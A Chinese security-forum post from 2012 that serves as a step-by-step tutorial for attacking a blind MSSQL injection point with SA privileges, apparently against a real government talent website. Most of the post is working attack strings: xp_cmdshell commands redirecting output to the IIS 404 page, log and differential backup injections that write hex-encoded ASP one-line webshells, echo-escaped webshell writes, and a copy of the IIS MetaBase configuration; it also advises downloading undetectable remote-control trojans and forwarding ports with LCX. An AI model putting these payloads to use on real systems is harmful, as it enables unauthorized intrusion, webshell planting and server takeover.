找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2221|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————( n2 P1 Q9 o" g9 d5 K

2 o8 ^$ h2 {" X* D9 d# o  B
* q* D" N5 t- ^- M                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
, C% A$ a% s* {* l; P
) `+ Q: J' V5 y                                                                 * I9 @( j- [( T9 k& s
                                                                 , o5 z* j" B- `' F  x! C
                                                                  论坛: http://www.90team.net/& a* {. |! U/ d" g

. c) N  a! m* e, ?% ~/ a4 ?9 U! K
' e' J2 ^- E- ~3 E0 W8 _- R# p2 \
% {$ `+ N2 A1 T) L* y6 i友情检测国家人才网
/ `% Y& p% {* Q' l4 ]6 T! B" B$ x7 u, I- A' ~

! I. Y) Y! k, R0 |内容:MSSQL注入SA权限不显错模式下的入侵2 R  ~: N8 j1 Z
0 N0 F1 j2 H  J5 u6 C8 |. S2 U% a- h

( ^/ G" e' B9 {. |; U- e一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
1 V  O. s; U6 w  X. H0 I0 r+ b/ z9 y* ~% V9 `
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
8 P& Y$ i- e( F8 \  o$ ~
/ F4 k' K* S" V! A
( P" {% m! @4 S9 n$ \% c0 u这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
1 y3 L1 x6 F6 `" v) `( E4 U7 {
) s# O# [+ W6 \( s4 N3 j8 V9 {6 D思路:
  [: `: k% J( o( Q) m8 @. Y2 t7 P' H" R8 X: X
首先:# ]. ~5 U8 f1 m
3 R; T& @! h, x; A
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
; p2 O! z, P9 C# \. ~; n! g1 b6 ?; Z  V
1.日志备份获得Webshell4 ~" d7 p2 ]1 b& a" d( l
8 O) A& r. u6 W
2.数据库差异备份获得Webshell% t' `9 w" E2 e7 f. f
  F5 b' i2 j7 h" S; M
4.直接下载免杀远控木马。: V& M: j4 I& E) @

  i/ K, m% d) i5.直接下载LCX将服务器端口转发出来
* Z, r0 R8 J: q3 M) s8 O* h
& u8 ~. {; J& e2 s. |( Q0 B2 w6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
( H6 T' E/ n/ C1 U, [7 u( z& W( q
" I$ z% B0 f3 i9 L1 D0 |6 B; y, q; F* h- i7 x
( O6 o9 i) v: i7 b( }0 f8 ]; `
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, % ^+ F' Y+ U. J/ n/ D

. U& }6 E( b  n" u我直接演示后面一个方法
/ p# J! z, T) e
- C1 E% a. n, C2 A' [' J2 {; \; d0 z9 U( \' q  o5 s* u, P1 I; `; ~
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL ) `8 B6 J% x5 C, X

. [$ V, g. X4 I& ?
) z% H6 f1 ~: {3 ^9 q0 j, {
. K8 d+ j  G: r; S* a. N
# o; M  X) s, ?+ x- ~◆日志备份:% `0 y) V9 C! D' i' d

2 Y8 z+ _. s9 w: @' a. B. u2 G7 z+ E4 H( _0 ^. [* W+ j+ o' l
1. 进行初始备份/ ]/ O1 d$ J4 ?- D; D4 |& j
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--/ h+ @( p0 x  ~; B- A+ l+ z

0 C9 ]; N$ C/ s( c* o, p6 M2 M2. 插入数据
1 P+ ?. }; t$ D7 L1 x;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
5 o7 ?% E  }2 I, r8 ?' y' ]! p% Z0 Q% Q* G8 y! y
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
( \* {4 K4 p! Y! U2 `- D  
! V. [* u  ]! a4 |( g3. 备份并获得文件,删除临时表
9 c9 s6 }# g9 n" Y3 T;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
$ a; d2 ]/ g3 |3 C6 E: _0 ~
* q  F- `1 z7 I% c: Z! L# q3 n2 A. \

+ Z$ _& e0 E3 O, w2 i2 p◆数据库差异备份% @# I+ Y; [( u
1 B( ]3 G1 w- I1 d
(1. 进行差异备份准备工作
9 F. n0 x- e" [% L) L- T9 F1 B7 @" V" `9 a* ~! A
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
; q' h; t: e6 ~4 n! [" m$ `( N
. x. S5 m( j, |2 V上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码; Q& M5 j/ P6 ]2 i
% o( I4 S& e; T4 N* U

" ~7 \" R4 ], x4 R8 o8 \2 X# w/ r(2. 将数据写入到数据库+ V, \& w; c" z! K( ^7 ]
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
5 l. a  p8 ]( J5 g% V6 j/ k
. Q: ]! y& _* z' e0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>% c# ~# X$ o" b) W) U

0 C1 r% s" @; `. @5 i  |0 x3. 备份数据库并清理临时文件
) Z0 F5 l7 l- t
# |5 U5 P. b4 p;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
) l8 v8 i$ v, Q6 t; i2 h8 T! h% j4 A9 r3 w
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
' y1 a( }; C) H& U3 a- g8 E# o1 T, e
2 @3 U( F. l6 g: w' D7 c
* ]0 e, n" F& Q& ^
用^转义字符来写ASP(一句话木马)文件的方法:     x; T5 O, b5 ?$ a( f9 Z8 _8 M

  J7 Z" p: {! f% V4 y; i1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
! F( \2 n) Y+ q; ~  u1 `" p& U8 ]- A* U8 @; D" I
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 5 O5 P! o) R( G8 ~; |

: M5 Y, W- z1 L- s9 [% \读取IIS配置信息获取web路径
3 s# I) i2 @. L3 ]8 G
$ s2 f) {9 V) H$ l2 ~/ [6 J     
  z! C$ e0 Y+ G; x9 T. y$ `: @1 ^9 \     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
' j7 K0 f5 Z0 K! j/ a, X
7 i5 W2 L7 z6 s' O执行命令4 p* W4 F1 ]1 s" d* W
     " ?* _, V5 m6 o4 i7 d
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
$ y3 Q! W) l- L0 N* u1 ?6 h+ D8 d9 r
/ ~3 y" ~, S0 p, v  J
+ i( M7 |) `* R/ z/ k( p5 t) H) ?: {. g8 r
$ M$ d. w7 m6 x* u# k' y6 [5 P

: U! m' ]+ e* R4 D! h! H! R3 i8 Q7 r- X* n

; M8 N& ~3 C+ {
& X, V* H: J! m" O1 S% C+ s" V1 K
% h/ j+ a8 x# V1 B6 ?. f6 d% |$ z, j' e+ M

7 v5 F* g' |, z6 s
5 p/ t* o4 Z/ H0 z% Z& L; z
+ r( e0 w- Z3 o3 R  b( p& O1 Q: t
6 f+ Y. n, }2 ^5 W( I2 l
8 a( s& W7 U5 }  a
  u, @  i- m6 ~2 k" f2 z7 x5 K! e# D* Y( @* c( k5 D

9 U( y+ a+ M! Q) X+ G5 u9 A$ m" d7 t+ o5 n8 P
% a( u* _1 c" A- J- m

0 \) b1 K4 x- b: C
$ |! y- q. o, k3 R: o% h* K2 E% E, d- _1 O% _! s2 |) C

4 }& W' k) W: B$ p7 k/ ]- ?
* e  V- ?* q0 k( a& F6 q
$ L* `1 r6 s) C7 |! z9 v, e* B1 s+ C* e4 _0 N: p
3 @$ P) x' @3 {/ z+ d  E! j

! ~4 n& k; H' N! y
; B' T3 ]7 U, k/ |: B  P) z( `2 d1 |

! e3 g- E9 g; i9 Z2 k% m$ S  z9 Y4 V5 e/ o; B& h  R+ u6 O
6 R3 D( t1 K  R* r
. P1 B1 y: A5 l5 e  D% h6 i

' V: J4 ?, U: w1 P
9 J; q/ F3 u) w4 k- R% {- g8 G7 S& c, Z0 W6 A2 b2 T# ^6 d
$ `# p: ?' G, [7 A/ O
" r. M( c) ~7 Z# j: ]5 j

4 x4 G& c+ q" U4 m0 U2 w3 w4 b2 O" B7 y, G0 B  l& x: {- `
5 O2 w* q$ t8 e8 B' Z9 {, P" H
& L9 c4 Z) j. Q, F4 Q  ~: z7 r
2 O3 x5 A, }6 }
* U4 B4 H& [9 \0 K6 X

+ a+ f; v0 p2 Z" w' d0 n4 o: R' l, I: ]# C5 n4 L6 j
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表